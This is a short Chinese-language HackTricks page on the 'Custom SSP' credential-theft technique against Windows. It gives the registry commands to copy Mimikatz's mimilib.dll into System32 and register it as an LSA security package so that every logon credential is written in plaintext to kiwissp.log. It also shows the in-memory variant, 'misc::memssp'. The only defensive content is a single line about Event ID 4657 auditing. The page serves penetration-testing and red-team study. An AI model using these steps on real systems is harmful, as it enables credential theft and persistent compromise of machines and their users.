Custom SSP
Tip
学习并实践 AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
学习并实践 GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
学习并实践 Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
浏览用于评估路线的 完整 HackTricks Training 目录(ARTA/GRTA/AzRTA)以及 Linux Hacking Expert (LHE)。
支持 HackTricks
- 查看 订阅方案!
- 加入 💬 Discord 群组、telegram 群组,关注 X/Twitter 上的 @hacktricks_live,或查看 LinkedIn 页面 和 YouTube 频道。
- 通过向 HackTricks 和 HackTricks Cloud github 仓库提交 PR,分享 hacking 技巧。
Custom SSP
了解什么是 SSP (Security Support Provider) 在这里。
您可以创建您自己的 SSP来捕获以明文形式使用的凭据以访问机器。
Mimilib
您可以使用 Mimikatz 提供的 mimilib.dll 二进制文件。这将把所有凭据以明文记录在一个文件中。
将 dll 放入 C:\Windows\System32\
获取现有 LSA 安全包的列表:
PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"
HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
Security Packages REG_MULTI_SZ kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u
将 mimilib.dll 添加到安全支持提供程序列表(安全包):
reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"
在重启后,所有凭据可以在 C:\Windows\System32\kiwissp.log 中以明文形式找到。
在内存中
您还可以直接使用 Mimikatz 在内存中注入此内容(请注意,这可能有点不稳定/无法工作):
privilege::debug
misc::memssp
这不会在重启后存活。
缓解措施
事件 ID 4657 - 审计创建/更改 HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages
Tip
学习并实践 AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
学习并实践 GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
学习并实践 Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
浏览用于评估路线的 完整 HackTricks Training 目录(ARTA/GRTA/AzRTA)以及 Linux Hacking Expert (LHE)。
支持 HackTricks
- 查看 订阅方案!
- 加入 💬 Discord 群组、telegram 群组,关注 X/Twitter 上的 @hacktricks_live,或查看 LinkedIn 页面 和 YouTube 频道。
- 通过向 HackTricks 和 HackTricks Cloud github 仓库提交 PR,分享 hacking 技巧。


